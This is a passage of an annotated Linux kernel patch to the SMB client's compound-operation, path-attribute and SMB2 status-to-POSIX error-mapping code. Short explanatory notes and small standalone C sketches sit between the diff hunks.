++						   full_path);
++		break;
++	case SMB2_OP_RENAME:
++		rqst[num_rqst].rq_iov = &vars->si_iov[0];
++		rqst[num_rqst].rq_nvec = 2;
++
++		len = (2 * UniStrnlen((wchar_t *)ptr, PATH_MAX));
++
++		vars->rename_info.ReplaceIfExists = 1;
++		vars->rename_info.RootDirectory = 0;
++		vars->rename_info.FileNameLength = cpu_to_le32(len);
++
++		size[0] = sizeof(struct smb2_file_rename_info);
++		data[0] = &vars->rename_info;
++
++		size[1] = len + 2 /* null */;
++		data[1] = (__le16 *)ptr;
++
++		if (cfile)
++			rc = SMB2_set_info_init(tcon, server,
++						&rqst[num_rqst],
++						cfile->fid.persistent_fid,
++						cfile->fid.volatile_fid,
++					current->tgid, FILE_RENAME_INFORMATION,
++					SMB2_O_INFO_FILE, 0, data, size);
++		else {
++			rc = SMB2_set_info_init(tcon, server,
++					&rqst[num_rqst],
++					COMPOUND_FID, COMPOUND_FID,
++					current->tgid, FILE_RENAME_INFORMATION,
++					SMB2_O_INFO_FILE, 0, data, size);
++			if (!rc) {
++				smb2_set_next_command(tcon, &rqst[num_rqst]);
++				smb2_set_related(&rqst[num_rqst]);
++			}
++		}
++		if (rc)
++			goto finished;
++		num_rqst++;
++		trace_smb3_rename_enter(xid, ses->Suid, tcon->tid, full_path);
++		break;
++	case SMB2_OP_HARDLINK:
++		rqst[num_rqst].rq_iov = &vars->si_iov[0];
++		rqst[num_rqst].rq_nvec = 2;
++
++		len = (2 * UniStrnlen((wchar_t *)ptr, PATH_MAX));
++
++		vars->link_info.ReplaceIfExists = 0;
++		vars->link_info.RootDirectory = 0;
++		vars->link_info.FileNameLength = cpu_to_le32(len);
++
++		size[0] = sizeof(struct smb2_file_link_info);
++		data[0] = &vars->link_info;
++
++		size[1] = len + 2 /* null */;
++		data[1] = (__le16 *)ptr;
++
++		rc = SMB2_set_info_init(tcon, server,
++					&rqst[num_rqst], COMPOUND_FID,
++					COMPOUND_FID, current->tgid,
++					FILE_LINK_INFORMATION,
++					SMB2_O_INFO_FILE, 0, data, size);
++		if (rc)
++			goto finished;
++		smb2_set_next_command(tcon, &rqst[num_rqst]);
++		smb2_set_related(&rqst[num_rqst++]);
++		trace_smb3_hardlink_enter(xid, ses->Suid, tcon->tid, full_path);
++		break;
++	default:
++		cifs_dbg(VFS, "Invalid command\n");
++		rc = -EINVAL;
++	}
++	if (rc)
++		goto finished;
++
++	/* We already have a handle so we can skip the close */
++	if (cfile)
++		goto after_close;
++	/* Close */
++	flags |= CIFS_CP_CREATE_CLOSE_OP;
++	rqst[num_rqst].rq_iov = &vars->close_iov[0];
++	rqst[num_rqst].rq_nvec = 1;
++	rc = SMB2_close_init(tcon, server,
++			     &rqst[num_rqst], COMPOUND_FID,
++			     COMPOUND_FID, false);
++	smb2_set_related(&rqst[num_rqst]);
++	if (rc)
++		goto finished;
++ after_close:
++	num_rqst++;
++
++	if (cfile) {
++		rc = compound_send_recv(xid, ses, server,
++					flags, num_rqst - 2,
++					&rqst[1], &resp_buftype[1],
++					&rsp_iov[1]);
++	} else
++		rc = compound_send_recv(xid, ses, server,
++					flags, num_rqst,
++					rqst, resp_buftype,
++					rsp_iov);
++
++ finished:
++	if (cfile)
++		cifsFileInfo_put(cfile);
++
++	SMB2_open_free(&rqst[0]);
++	if (rc == -EREMCHG) {
++		pr_warn_once("server share %s deleted\n", tcon->tree_name);
++		tcon->need_reconnect = true;
++	}
++
++	switch (command) {
++	case SMB2_OP_QUERY_INFO:
++		idata = ptr;
++		if (rc == 0 && cfile && cfile->symlink_target) {
++			idata->symlink_target = kstrdup(cfile->symlink_target, GFP_KERNEL);
++			if (!idata->symlink_target)
++				rc = -ENOMEM;
++		}
++		if (rc == 0) {
++			qi_rsp = (struct smb2_query_info_rsp *)
++				rsp_iov[1].iov_base;
++			rc = smb2_validate_and_copy_iov(
++				le16_to_cpu(qi_rsp->OutputBufferOffset),
++				le32_to_cpu(qi_rsp->OutputBufferLength),
++				&rsp_iov[1], sizeof(idata->fi), (char *)&idata->fi);
++		}
++		if (rqst[1].rq_iov)
++			SMB2_query_info_free(&rqst[1]);
++		if (rqst[2].rq_iov)
++			SMB2_close_free(&rqst[2]);
++		if (rc)
++			trace_smb3_query_info_compound_err(xid,  ses->Suid,
++						tcon->tid, rc);
++		else
++			trace_smb3_query_info_compound_done(xid, ses->Suid,
++						tcon->tid);
++		break;
++	case SMB2_OP_POSIX_QUERY_INFO:
++		idata = ptr;
++		if (rc == 0 && cfile && cfile->symlink_target) {
++			idata->symlink_target = kstrdup(cfile->symlink_target, GFP_KERNEL);
++			if (!idata->symlink_target)
++				rc = -ENOMEM;
++		}
++		if (rc == 0) {
++			qi_rsp = (struct smb2_query_info_rsp *)
++				rsp_iov[1].iov_base;
++			rc = smb2_validate_and_copy_iov(
++				le16_to_cpu(qi_rsp->OutputBufferOffset),
++				le32_to_cpu(qi_rsp->OutputBufferLength),
++				&rsp_iov[1], sizeof(idata->posix_fi) /* add SIDs */,
++				(char *)&idata->posix_fi);
++		}
++		if (rqst[1].rq_iov)
++			SMB2_query_info_free(&rqst[1]);
++		if (rqst[2].rq_iov)
++			SMB2_close_free(&rqst[2]);
++		if (rc)
++			trace_smb3_posix_query_info_compound_err(xid,  ses->Suid, tcon->tid, rc);
++		else
++			trace_smb3_posix_query_info_compound_done(xid, ses->Suid, tcon->tid);
++		break;
++	case SMB2_OP_DELETE:
++		if (rc)
++			trace_smb3_delete_err(xid,  ses->Suid, tcon->tid, rc);
++		else
++			trace_smb3_delete_done(xid, ses->Suid, tcon->tid);
++		if (rqst[1].rq_iov)
++			SMB2_close_free(&rqst[1]);
++		break;
++	case SMB2_OP_MKDIR:
++		if (rc)
++			trace_smb3_mkdir_err(xid,  ses->Suid, tcon->tid, rc);
++		else
++			trace_smb3_mkdir_done(xid, ses->Suid, tcon->tid);
++		if (rqst[1].rq_iov)
++			SMB2_close_free(&rqst[1]);
++		break;
++	case SMB2_OP_HARDLINK:
++		if (rc)
++			trace_smb3_hardlink_err(xid,  ses->Suid, tcon->tid, rc);
++		else
++			trace_smb3_hardlink_done(xid, ses->Suid, tcon->tid);
++		free_set_inf_compound(rqst);
++		break;
++	case SMB2_OP_RENAME:
++		if (rc)
++			trace_smb3_rename_err(xid,  ses->Suid, tcon->tid, rc);
++		else
++			trace_smb3_rename_done(xid, ses->Suid, tcon->tid);
++		free_set_inf_compound(rqst);
++		break;
++	case SMB2_OP_RMDIR:
++		if (rc)
++			trace_smb3_rmdir_err(xid,  ses->Suid, tcon->tid, rc);
++		else
++			trace_smb3_rmdir_done(xid, ses->Suid, tcon->tid);
++		free_set_inf_compound(rqst);
++		break;
++	case SMB2_OP_SET_EOF:
++		if (rc)
++			trace_smb3_set_eof_err(xid,  ses->Suid, tcon->tid, rc);
++		else
++			trace_smb3_set_eof_done(xid, ses->Suid, tcon->tid);
++		free_set_inf_compound(rqst);
++		break;
++	case SMB2_OP_SET_INFO:
++		if (rc)
++			trace_smb3_set_info_compound_err(xid,  ses->Suid,
++						tcon->tid, rc);
++		else
++			trace_smb3_set_info_compound_done(xid, ses->Suid,
++						tcon->tid);
++		free_set_inf_compound(rqst);
++		break;
++	}
++
++	if (rc && err_iov && err_buftype) {
++		memcpy(err_iov, rsp_iov, 3 * sizeof(*err_iov));
++		memcpy(err_buftype, resp_buftype, 3 * sizeof(*err_buftype));
++	} else {
++		free_rsp_buf(resp_buftype[0], rsp_iov[0].iov_base);
++		free_rsp_buf(resp_buftype[1], rsp_iov[1].iov_base);
++		free_rsp_buf(resp_buftype[2], rsp_iov[2].iov_base);
++	}
++	kfree(vars);
++	return rc;
++}
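
The function above always builds the same shape of compound: an optional open,
the operation itself, and an optional close, where every request after the
first is marked related so the server applies it to the handle produced by the
open. A standalone sketch of that chaining, reusing the flag values from
smb2glob.h (fake_rqst is illustrative, not the kernel's smb_rqst):

#include <stdio.h>

#define CHAINED_REQUEST 1
#define START_OF_CHAIN  2
#define END_OF_CHAIN    4
#define RELATED_REQUEST 8

struct fake_rqst { const char *what; int flags; };

int main(void)
{
	struct fake_rqst rqst[3] = {
		{ "open", 0 }, { "query", 0 }, { "close", 0 },
	};
	int i, n = 3;

	for (i = 0; i < n; i++) {
		rqst[i].flags |= CHAINED_REQUEST;
		if (i == 0)
			rqst[i].flags |= START_OF_CHAIN;
		else
			rqst[i].flags |= RELATED_REQUEST; /* reuse open's handle */
		if (i == n - 1)
			rqst[i].flags |= END_OF_CHAIN;
	}
	for (i = 0; i < n; i++)
		printf("%-5s flags=0x%x\n", rqst[i].what, rqst[i].flags);
	return 0;
}

When a cached handle (cfile) is available, the worker skips both ends of the
chain and sends only the middle operation, which is why it sends num_rqst - 2
requests starting at rqst[1] in that case.
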
++
++int smb2_query_path_info(const unsigned int xid, struct cifs_tcon *tcon,
++			 struct cifs_sb_info *cifs_sb, const char *full_path,
++			 struct cifs_open_info_data *data, bool *adjust_tz, bool *reparse)
++{
++	__u32 create_options = 0;
++	struct cifsFileInfo *cfile;
++	struct cached_fid *cfid = NULL;
++	struct kvec err_iov[3] = {};
++	int err_buftype[3] = {};
++	bool islink;
++	int rc, rc2;
++
++	*adjust_tz = false;
++	*reparse = false;
++
++	if (strcmp(full_path, ""))
++		rc = -ENOENT;
++	else
++		rc = open_cached_dir(xid, tcon, full_path, cifs_sb, false, &cfid);
++	/* If it is a root and its handle is cached then use it */
++	if (!rc) {
++		if (cfid->file_all_info_is_valid) {
++			memcpy(&data->fi, &cfid->file_all_info, sizeof(data->fi));
++		} else {
++			rc = SMB2_query_info(xid, tcon, cfid->fid.persistent_fid,
++					     cfid->fid.volatile_fid, &data->fi);
++		}
++		close_cached_dir(cfid);
++		return rc;
++	}
++
++	cifs_get_readable_path(tcon, full_path, &cfile);
++	rc = smb2_compound_op(xid, tcon, cifs_sb, full_path, FILE_READ_ATTRIBUTES, FILE_OPEN,
++			      create_options, ACL_NO_MODE, data, SMB2_OP_QUERY_INFO, cfile,
++			      err_iov, err_buftype);
++	if (rc) {
++		struct smb2_hdr *hdr = err_iov[0].iov_base;
++
++		if (unlikely(!hdr || err_buftype[0] == CIFS_NO_BUFFER))
++			goto out;
++		if (rc == -EOPNOTSUPP && hdr->Command == SMB2_CREATE &&
++		    hdr->Status == STATUS_STOPPED_ON_SYMLINK) {
++			rc = smb2_parse_symlink_response(cifs_sb, err_iov,
++							 &data->symlink_target);
++			if (rc)
++				goto out;
++
++			*reparse = true;
++			create_options |= OPEN_REPARSE_POINT;
++
++			/* Failed on a symbolic link - query the reparse point info */
++			cifs_get_readable_path(tcon, full_path, &cfile);
++			rc = smb2_compound_op(xid, tcon, cifs_sb, full_path,
++					      FILE_READ_ATTRIBUTES, FILE_OPEN,
++					      create_options, ACL_NO_MODE, data,
++					      SMB2_OP_QUERY_INFO, cfile, NULL, NULL);
++			goto out;
++		} else if (rc != -EREMOTE && hdr->Status == STATUS_OBJECT_NAME_INVALID) {
++			rc2 = cifs_inval_name_dfs_link_error(xid, tcon, cifs_sb,
++							     full_path, &islink);
++			if (rc2) {
++				rc = rc2;
++				goto out;
++			}
++			if (islink)
++				rc = -EREMOTE;
++		}
++		if (rc == -EREMOTE && IS_ENABLED(CONFIG_CIFS_DFS_UPCALL) && cifs_sb &&
++		    (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_DFS))
++			rc = -EOPNOTSUPP;
++	}
++
++out:
++	free_rsp_buf(err_buftype[0], err_iov[0].iov_base);
++	free_rsp_buf(err_buftype[1], err_iov[1].iov_base);
++	free_rsp_buf(err_buftype[2], err_iov[2].iov_base);
++	return rc;
++}
++
++int smb311_posix_query_path_info(const unsigned int xid, struct cifs_tcon *tcon,
++				 struct cifs_sb_info *cifs_sb, const char *full_path,
++				 struct cifs_open_info_data *data, bool *adjust_tz, bool *reparse)
++{
++	int rc;
++	__u32 create_options = 0;
++	struct cifsFileInfo *cfile;
++	struct kvec err_iov[3] = {};
++	int err_buftype[3] = {};
++
++	*adjust_tz = false;
++	*reparse = false;
++
++	/*
++	 * BB TODO: Add support for using the cached root handle.
++	 * Create an SMB2_query_posix_info worker function to do a non-compounded query
++	 * when we already have an open file handle for this. For now this is fast enough
++	 * (always using the compounded version).
++	 */
++
++	cifs_get_readable_path(tcon, full_path, &cfile);
++	rc = smb2_compound_op(xid, tcon, cifs_sb, full_path, FILE_READ_ATTRIBUTES, FILE_OPEN,
++			      create_options, ACL_NO_MODE, data, SMB2_OP_POSIX_QUERY_INFO, cfile,
++			      err_iov, err_buftype);
++	if (rc == -EOPNOTSUPP) {
++		/* BB TODO: When support for special files is added to Samba, re-verify this path */
++		if (err_iov[0].iov_base && err_buftype[0] != CIFS_NO_BUFFER &&
++		    ((struct smb2_hdr *)err_iov[0].iov_base)->Command == SMB2_CREATE &&
++		    ((struct smb2_hdr *)err_iov[0].iov_base)->Status == STATUS_STOPPED_ON_SYMLINK) {
++			rc = smb2_parse_symlink_response(cifs_sb, err_iov, &data->symlink_target);
++			if (rc)
++				goto out;
++		}
++		*reparse = true;
++		create_options |= OPEN_REPARSE_POINT;
++
++		/* Failed on a symbolic link - query the reparse point info */
++		cifs_get_readable_path(tcon, full_path, &cfile);
++		rc = smb2_compound_op(xid, tcon, cifs_sb, full_path, FILE_READ_ATTRIBUTES,
++				      FILE_OPEN, create_options, ACL_NO_MODE, data,
++				      SMB2_OP_POSIX_QUERY_INFO, cfile, NULL, NULL);
++	}
++
++out:
++	free_rsp_buf(err_buftype[0], err_iov[0].iov_base);
++	free_rsp_buf(err_buftype[1], err_iov[1].iov_base);
++	free_rsp_buf(err_buftype[2], err_iov[2].iov_base);
++	return rc;
++}
++
++int
++smb2_mkdir(const unsigned int xid, struct inode *parent_inode, umode_t mode,
++	   struct cifs_tcon *tcon, const char *name,
++	   struct cifs_sb_info *cifs_sb)
++{
++	return smb2_compound_op(xid, tcon, cifs_sb, name,
++				FILE_WRITE_ATTRIBUTES, FILE_CREATE,
++				CREATE_NOT_FILE, mode, NULL, SMB2_OP_MKDIR,
++				NULL, NULL, NULL);
++}
++
++void
++smb2_mkdir_setinfo(struct inode *inode, const char *name,
++		   struct cifs_sb_info *cifs_sb, struct cifs_tcon *tcon,
++		   const unsigned int xid)
++{
++	FILE_BASIC_INFO data;
++	struct cifsInodeInfo *cifs_i;
++	struct cifsFileInfo *cfile;
++	u32 dosattrs;
++	int tmprc;
++
++	memset(&data, 0, sizeof(data));
++	cifs_i = CIFS_I(inode);
++	dosattrs = cifs_i->cifsAttrs | ATTR_READONLY;
++	data.Attributes = cpu_to_le32(dosattrs);
++	cifs_get_writable_path(tcon, name, FIND_WR_ANY, &cfile);
++	tmprc = smb2_compound_op(xid, tcon, cifs_sb, name,
++				 FILE_WRITE_ATTRIBUTES, FILE_CREATE,
++				 CREATE_NOT_FILE, ACL_NO_MODE,
++				 &data, SMB2_OP_SET_INFO, cfile, NULL, NULL);
++	if (tmprc == 0)
++		cifs_i->cifsAttrs = dosattrs;
++}
++
++int
++smb2_rmdir(const unsigned int xid, struct cifs_tcon *tcon, const char *name,
++	   struct cifs_sb_info *cifs_sb)
++{
++	drop_cached_dir_by_name(xid, tcon, name, cifs_sb);
++	return smb2_compound_op(xid, tcon, cifs_sb, name, DELETE, FILE_OPEN,
++				CREATE_NOT_FILE, ACL_NO_MODE,
++				NULL, SMB2_OP_RMDIR, NULL, NULL, NULL);
++}
++
++int
++smb2_unlink(const unsigned int xid, struct cifs_tcon *tcon, const char *name,
++	    struct cifs_sb_info *cifs_sb)
++{
++	return smb2_compound_op(xid, tcon, cifs_sb, name, DELETE, FILE_OPEN,
++				CREATE_DELETE_ON_CLOSE | OPEN_REPARSE_POINT,
++				ACL_NO_MODE, NULL, SMB2_OP_DELETE, NULL, NULL, NULL);
++}
++
++static int
++smb2_set_path_attr(const unsigned int xid, struct cifs_tcon *tcon,
++		   const char *from_name, const char *to_name,
++		   struct cifs_sb_info *cifs_sb, __u32 access, int command,
++		   struct cifsFileInfo *cfile)
++{
++	__le16 *smb2_to_name = NULL;
++	int rc;
++
++	smb2_to_name = cifs_convert_path_to_utf16(to_name, cifs_sb);
++	if (smb2_to_name == NULL) {
++		rc = -ENOMEM;
++		goto smb2_rename_path;
++	}
++	rc = smb2_compound_op(xid, tcon, cifs_sb, from_name, access,
++			      FILE_OPEN, 0, ACL_NO_MODE, smb2_to_name,
++			      command, cfile, NULL, NULL);
++smb2_rename_path:
++	kfree(smb2_to_name);
++	return rc;
++}
++
++int
++smb2_rename_path(const unsigned int xid, struct cifs_tcon *tcon,
++		 const char *from_name, const char *to_name,
++		 struct cifs_sb_info *cifs_sb)
++{
++	struct cifsFileInfo *cfile;
++
++	drop_cached_dir_by_name(xid, tcon, from_name, cifs_sb);
++	cifs_get_writable_path(tcon, from_name, FIND_WR_WITH_DELETE, &cfile);
++
++	return smb2_set_path_attr(xid, tcon, from_name, to_name,
++				  cifs_sb, DELETE, SMB2_OP_RENAME, cfile);
++}
++
++int
++smb2_create_hardlink(const unsigned int xid, struct cifs_tcon *tcon,
++		     const char *from_name, const char *to_name,
++		     struct cifs_sb_info *cifs_sb)
++{
++	return smb2_set_path_attr(xid, tcon, from_name, to_name, cifs_sb,
++				  FILE_READ_ATTRIBUTES, SMB2_OP_HARDLINK,
++				  NULL);
++}
++
++int
++smb2_set_path_size(const unsigned int xid, struct cifs_tcon *tcon,
++		   const char *full_path, __u64 size,
++		   struct cifs_sb_info *cifs_sb, bool set_alloc)
++{
++	__le64 eof = cpu_to_le64(size);
++	struct cifsFileInfo *cfile;
++
++	cifs_get_writable_path(tcon, full_path, FIND_WR_ANY, &cfile);
++	return smb2_compound_op(xid, tcon, cifs_sb, full_path,
++				FILE_WRITE_DATA, FILE_OPEN, 0, ACL_NO_MODE,
++				&eof, SMB2_OP_SET_EOF, cfile, NULL, NULL);
++}
++
++int
++smb2_set_file_info(struct inode *inode, const char *full_path,
++		   FILE_BASIC_INFO *buf, const unsigned int xid)
++{
++	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
++	struct tcon_link *tlink;
++	struct cifs_tcon *tcon;
++	struct cifsFileInfo *cfile;
++	int rc;
++
++	if ((buf->CreationTime == 0) && (buf->LastAccessTime == 0) &&
++	    (buf->LastWriteTime == 0) && (buf->ChangeTime == 0) &&
++	    (buf->Attributes == 0))
++		return 0; /* would be a no op, no sense sending this */
++
++	tlink = cifs_sb_tlink(cifs_sb);
++	if (IS_ERR(tlink))
++		return PTR_ERR(tlink);
++	tcon = tlink_tcon(tlink);
++
++	cifs_get_writable_path(tcon, full_path, FIND_WR_ANY, &cfile);
++	rc = smb2_compound_op(xid, tcon, cifs_sb, full_path,
++			      FILE_WRITE_ATTRIBUTES, FILE_OPEN,
++			      0, ACL_NO_MODE, buf, SMB2_OP_SET_INFO, cfile,
++			      NULL, NULL);
++	cifs_put_tlink(tlink);
++	return rc;
++}
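
The early return above avoids a round trip when every field of the
FILE_BASIC_INFO is zero. The same guard as a standalone predicate (struct
layout paraphrased here for illustration):

#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

struct basic_info {
	int64_t creation_time, last_access_time, last_write_time, change_time;
	uint32_t attributes;
};

/* true when sending the set-info request would change nothing */
static bool basic_info_is_noop(const struct basic_info *b)
{
	return !b->creation_time && !b->last_access_time &&
	       !b->last_write_time && !b->change_time && !b->attributes;
}

int main(void)
{
	struct basic_info b = {0};

	printf("no-op? %s\n", basic_info_is_noop(&b) ? "yes" : "no");
	return 0;
}
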
+diff --git a/fs/smb/client/smb2maperror.c b/fs/smb/client/smb2maperror.c
+new file mode 100644
+index 0000000000000..194799ddd3828
+--- /dev/null
++++ b/fs/smb/client/smb2maperror.c
+@@ -0,0 +1,2481 @@
++// SPDX-License-Identifier: LGPL-2.1
++/*
++ *
++ *   Functions which do error mapping of SMB2 status codes to POSIX errors
++ *
++ *   Copyright (C) International Business Machines  Corp., 2009
++ *   Author(s): Steve French (sfrench@us.ibm.com)
++ *
++ */
++#include <linux/errno.h>
++#include "cifsglob.h"
++#include "cifs_debug.h"
++#include "smb2pdu.h"
++#include "smb2proto.h"
++#include "smb2status.h"
++#include "smb2glob.h"
++#include "trace.h"
++
++struct status_to_posix_error {
++	__le32 smb2_status;
++	int posix_error;
++	char *status_string;
++};
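
The table that follows is consumed by a lookup helper elsewhere in the client
code; this hunk only adds the data. A sketch of the data-driven mapping idea,
with a three-entry local table and -EIO as the fallback for unknown codes (the
status values match MS-ERREF, but the helper itself is illustrative):

#include <stddef.h>
#include <stdio.h>

struct status_map { unsigned int status; int posix_error; const char *name; };

static const struct status_map table[] = {
	{ 0x00000000,   0, "STATUS_SUCCESS" },
	{ 0xC0000022, -13, "STATUS_ACCESS_DENIED" },		/* -EACCES */
	{ 0xC0000034,  -2, "STATUS_OBJECT_NAME_NOT_FOUND" },	/* -ENOENT */
};

static int map_status(unsigned int status)
{
	size_t i;

	for (i = 0; i < sizeof(table) / sizeof(table[0]); i++)
		if (table[i].status == status)
			return table[i].posix_error;
	return -5;	/* fall back to -EIO for unknown codes */
}

int main(void)
{
	printf("0xC0000022 -> %d\n", map_status(0xC0000022u));
	return 0;
}
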
++
++static const struct status_to_posix_error smb2_error_map_table[] = {
++	{STATUS_SUCCESS, 0, "STATUS_SUCCESS"},
++	{STATUS_WAIT_0,  0, "STATUS_WAIT_0"},
++	{STATUS_WAIT_1, -EIO, "STATUS_WAIT_1"},
++	{STATUS_WAIT_2, -EIO, "STATUS_WAIT_2"},
++	{STATUS_WAIT_3, -EIO, "STATUS_WAIT_3"},
++	{STATUS_WAIT_63, -EIO, "STATUS_WAIT_63"},
++	{STATUS_ABANDONED, -EIO, "STATUS_ABANDONED"},
++	{STATUS_ABANDONED_WAIT_0, -EIO, "STATUS_ABANDONED_WAIT_0"},
++	{STATUS_ABANDONED_WAIT_63, -EIO, "STATUS_ABANDONED_WAIT_63"},
++	{STATUS_USER_APC, -EIO, "STATUS_USER_APC"},
++	{STATUS_KERNEL_APC, -EIO, "STATUS_KERNEL_APC"},
++	{STATUS_ALERTED, -EIO, "STATUS_ALERTED"},
++	{STATUS_TIMEOUT, -ETIMEDOUT, "STATUS_TIMEOUT"},
++	{STATUS_PENDING, -EIO, "STATUS_PENDING"},
++	{STATUS_REPARSE, -EIO, "STATUS_REPARSE"},
++	{STATUS_MORE_ENTRIES, -EIO, "STATUS_MORE_ENTRIES"},
++	{STATUS_NOT_ALL_ASSIGNED, -EIO, "STATUS_NOT_ALL_ASSIGNED"},
++	{STATUS_SOME_NOT_MAPPED, -EIO, "STATUS_SOME_NOT_MAPPED"},
++	{STATUS_OPLOCK_BREAK_IN_PROGRESS, -EIO,
++	"STATUS_OPLOCK_BREAK_IN_PROGRESS"},
++	{STATUS_VOLUME_MOUNTED, -EIO, "STATUS_VOLUME_MOUNTED"},
++	{STATUS_RXACT_COMMITTED, -EIO, "STATUS_RXACT_COMMITTED"},
++	{STATUS_NOTIFY_CLEANUP, -EIO, "STATUS_NOTIFY_CLEANUP"},
++	{STATUS_NOTIFY_ENUM_DIR, -EIO, "STATUS_NOTIFY_ENUM_DIR"},
++	{STATUS_NO_QUOTAS_FOR_ACCOUNT, -EIO, "STATUS_NO_QUOTAS_FOR_ACCOUNT"},
++	{STATUS_PRIMARY_TRANSPORT_CONNECT_FAILED, -EIO,
++	"STATUS_PRIMARY_TRANSPORT_CONNECT_FAILED"},
++	{STATUS_PAGE_FAULT_TRANSITION, -EIO, "STATUS_PAGE_FAULT_TRANSITION"},
++	{STATUS_PAGE_FAULT_DEMAND_ZERO, -EIO, "STATUS_PAGE_FAULT_DEMAND_ZERO"},
++	{STATUS_PAGE_FAULT_COPY_ON_WRITE, -EIO,
++	"STATUS_PAGE_FAULT_COPY_ON_WRITE"},
++	{STATUS_PAGE_FAULT_GUARD_PAGE, -EIO, "STATUS_PAGE_FAULT_GUARD_PAGE"},
++	{STATUS_PAGE_FAULT_PAGING_FILE, -EIO, "STATUS_PAGE_FAULT_PAGING_FILE"},
++	{STATUS_CACHE_PAGE_LOCKED, -EIO, "STATUS_CACHE_PAGE_LOCKED"},
++	{STATUS_CRASH_DUMP, -EIO, "STATUS_CRASH_DUMP"},
++	{STATUS_BUFFER_ALL_ZEROS, -EIO, "STATUS_BUFFER_ALL_ZEROS"},
++	{STATUS_REPARSE_OBJECT, -EIO, "STATUS_REPARSE_OBJECT"},
++	{STATUS_RESOURCE_REQUIREMENTS_CHANGED, -EIO,
++	"STATUS_RESOURCE_REQUIREMENTS_CHANGED"},
++	{STATUS_TRANSLATION_COMPLETE, -EIO, "STATUS_TRANSLATION_COMPLETE"},
++	{STATUS_DS_MEMBERSHIP_EVALUATED_LOCALLY, -EIO,
++	"STATUS_DS_MEMBERSHIP_EVALUATED_LOCALLY"},
++	{STATUS_NOTHING_TO_TERMINATE, -EIO, "STATUS_NOTHING_TO_TERMINATE"},
++	{STATUS_PROCESS_NOT_IN_JOB, -EIO, "STATUS_PROCESS_NOT_IN_JOB"},
++	{STATUS_PROCESS_IN_JOB, -EIO, "STATUS_PROCESS_IN_JOB"},
++	{STATUS_VOLSNAP_HIBERNATE_READY, -EIO,
++	"STATUS_VOLSNAP_HIBERNATE_READY"},
++	{STATUS_FSFILTER_OP_COMPLETED_SUCCESSFULLY, -EIO,
++	"STATUS_FSFILTER_OP_COMPLETED_SUCCESSFULLY"},
++	{STATUS_INTERRUPT_VECTOR_ALREADY_CONNECTED, -EIO,
++	"STATUS_INTERRUPT_VECTOR_ALREADY_CONNECTED"},
++	{STATUS_INTERRUPT_STILL_CONNECTED, -EIO,
++	"STATUS_INTERRUPT_STILL_CONNECTED"},
++	{STATUS_PROCESS_CLONED, -EIO, "STATUS_PROCESS_CLONED"},
++	{STATUS_FILE_LOCKED_WITH_ONLY_READERS, -EIO,
++	"STATUS_FILE_LOCKED_WITH_ONLY_READERS"},
++	{STATUS_FILE_LOCKED_WITH_WRITERS, -EIO,
++	"STATUS_FILE_LOCKED_WITH_WRITERS"},
++	{STATUS_RESOURCEMANAGER_READ_ONLY, -EROFS,
++	"STATUS_RESOURCEMANAGER_READ_ONLY"},
++	{STATUS_WAIT_FOR_OPLOCK, -EIO, "STATUS_WAIT_FOR_OPLOCK"},
++	{DBG_EXCEPTION_HANDLED, -EIO, "DBG_EXCEPTION_HANDLED"},
++	{DBG_CONTINUE, -EIO, "DBG_CONTINUE"},
++	{STATUS_FLT_IO_COMPLETE, -EIO, "STATUS_FLT_IO_COMPLETE"},
++	{STATUS_OBJECT_NAME_EXISTS, -EIO, "STATUS_OBJECT_NAME_EXISTS"},
++	{STATUS_THREAD_WAS_SUSPENDED, -EIO, "STATUS_THREAD_WAS_SUSPENDED"},
++	{STATUS_WORKING_SET_LIMIT_RANGE, -EIO,
++	"STATUS_WORKING_SET_LIMIT_RANGE"},
++	{STATUS_IMAGE_NOT_AT_BASE, -EIO, "STATUS_IMAGE_NOT_AT_BASE"},
++	{STATUS_RXACT_STATE_CREATED, -EIO, "STATUS_RXACT_STATE_CREATED"},
++	{STATUS_SEGMENT_NOTIFICATION, -EIO, "STATUS_SEGMENT_NOTIFICATION"},
++	{STATUS_LOCAL_USER_SESSION_KEY, -EIO, "STATUS_LOCAL_USER_SESSION_KEY"},
++	{STATUS_BAD_CURRENT_DIRECTORY, -EIO, "STATUS_BAD_CURRENT_DIRECTORY"},
++	{STATUS_SERIAL_MORE_WRITES, -EIO, "STATUS_SERIAL_MORE_WRITES"},
++	{STATUS_REGISTRY_RECOVERED, -EIO, "STATUS_REGISTRY_RECOVERED"},
++	{STATUS_FT_READ_RECOVERY_FROM_BACKUP, -EIO,
++	"STATUS_FT_READ_RECOVERY_FROM_BACKUP"},
++	{STATUS_FT_WRITE_RECOVERY, -EIO, "STATUS_FT_WRITE_RECOVERY"},
++	{STATUS_SERIAL_COUNTER_TIMEOUT, -ETIMEDOUT,
++	"STATUS_SERIAL_COUNTER_TIMEOUT"},
++	{STATUS_NULL_LM_PASSWORD, -EIO, "STATUS_NULL_LM_PASSWORD"},
++	{STATUS_IMAGE_MACHINE_TYPE_MISMATCH, -EIO,
++	"STATUS_IMAGE_MACHINE_TYPE_MISMATCH"},
++	{STATUS_RECEIVE_PARTIAL, -EIO, "STATUS_RECEIVE_PARTIAL"},
++	{STATUS_RECEIVE_EXPEDITED, -EIO, "STATUS_RECEIVE_EXPEDITED"},
++	{STATUS_RECEIVE_PARTIAL_EXPEDITED, -EIO,
++	"STATUS_RECEIVE_PARTIAL_EXPEDITED"},
++	{STATUS_EVENT_DONE, -EIO, "STATUS_EVENT_DONE"},
++	{STATUS_EVENT_PENDING, -EIO, "STATUS_EVENT_PENDING"},
++	{STATUS_CHECKING_FILE_SYSTEM, -EIO, "STATUS_CHECKING_FILE_SYSTEM"},
++	{STATUS_FATAL_APP_EXIT, -EIO, "STATUS_FATAL_APP_EXIT"},
++	{STATUS_PREDEFINED_HANDLE, -EIO, "STATUS_PREDEFINED_HANDLE"},
++	{STATUS_WAS_UNLOCKED, -EIO, "STATUS_WAS_UNLOCKED"},
++	{STATUS_SERVICE_NOTIFICATION, -EIO, "STATUS_SERVICE_NOTIFICATION"},
++	{STATUS_WAS_LOCKED, -EIO, "STATUS_WAS_LOCKED"},
++	{STATUS_LOG_HARD_ERROR, -EIO, "STATUS_LOG_HARD_ERROR"},
++	{STATUS_ALREADY_WIN32, -EIO, "STATUS_ALREADY_WIN32"},
++	{STATUS_WX86_UNSIMULATE, -EIO, "STATUS_WX86_UNSIMULATE"},
++	{STATUS_WX86_CONTINUE, -EIO, "STATUS_WX86_CONTINUE"},
++	{STATUS_WX86_SINGLE_STEP, -EIO, "STATUS_WX86_SINGLE_STEP"},
